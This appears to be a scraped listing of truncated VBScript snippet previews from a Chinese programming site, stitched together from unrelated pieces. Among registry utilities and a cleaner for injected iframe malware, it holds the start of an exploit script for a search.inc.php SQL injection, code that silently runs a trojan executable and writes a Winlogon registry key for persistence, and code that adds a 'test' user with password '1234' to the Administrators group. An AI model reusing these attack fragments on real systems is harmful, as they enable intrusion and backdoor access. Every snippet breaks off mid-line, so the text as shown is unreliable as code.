也利于修改 以下是search.inc.php 文件漏洞利用代码VBS版 复制代码 代码如下: Dim strUrl,strSite,strPath,strUid showB() Set Args = Wscript.Arguments If Args.Count 3 Then ShowU() Else strSite=Args(0) strPath=Args(1) strUid=Args(2) End If strUrl='action=search&searchid=22%cf'' UNI

如果不用组件的话，代码如下： setie=createobject('internetexplorer.application') ie.navigate'about:blank' dountilie.readystate=4:wscript.sleep25:loop setdoc=ie.document setbody=doc.body setwin=doc.parentwindow body.innerhtml='OBJECTid=dlgCLASSID=''clsid:3050f819-98

复制代码 代码如下: ''***************************************************************************** '' FileName: Reg2Vbs.VBS '' Author: baomaboy '' Abstract: 将Reg文件转换为VBS文件保存 ''***************************************************************************** Dim

均在命令行下使用 AntiIframe.vbs #该脚本是批量挂马程序的逆向，用于批量清除被添加到文件中的恶意代码。记事本打开文件可以修改Pattern参数指定要处理的文件名，文件名之间用|隔开（也支持vbs正则表达式）。由于要修改文件，请谨慎的使用（最好先备份文件） #用法: CScript AntiIframe.vbs [处理的路径] [包含清除内容的文

''要用到regtool.ocx,请下载http://www.jb51.net/jslib/regtool.ocx,用前请regsvr32regtool.ocx setwshshell=CreateObject('WScript.Shell') setregistry=CreateObject('regtool.tob') ''获取一个dictionary对象存储键名 setdict=CreateObject('Scripting.Dictionary') ''列举HKEY_CLASSES_RO

呵呵～不过别人一般没这个闲工夫检查那么多位置的！就连我也做不到～～ 复制代码 代码如下: dim wsh set wsh=CreateObject('WScript.Shell') wsh.run '%windir%\flumasko.exe',0 //运行木马程序 set sm=Wscript.CreateObject('WScript.Shell') sm.RegWrite 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogo

setwsnetwork=CreateObject('WSCRIPT.NETWORK') os='WinNT://'&wsnetwork.ComputerName Setob=GetObject(os)''得到adsi接口,绑定 Setoe=GetObject(os&'/Administrators,group')''属性,admin组 Setod=ob.Create('user','test')''建立用户 od.SetPassword'1234'''设置密码 od.SetInfo''保存 S

①创建主键、创建各类型的键值。 ②读取键值并分析键值类型。 ③枚举主键及键值。 ④判断键或键值是否存在。 ⑤查询注册表键的操作权限。 ⑥监视注册表根键、主键、键值，当发现变动时提示。 复制代码 代码如下: ''''''注册表查询/操作 On Error Resume Next Const HKEY_CLASSES_ROOT = &H80000000''''''设置注册表5大根键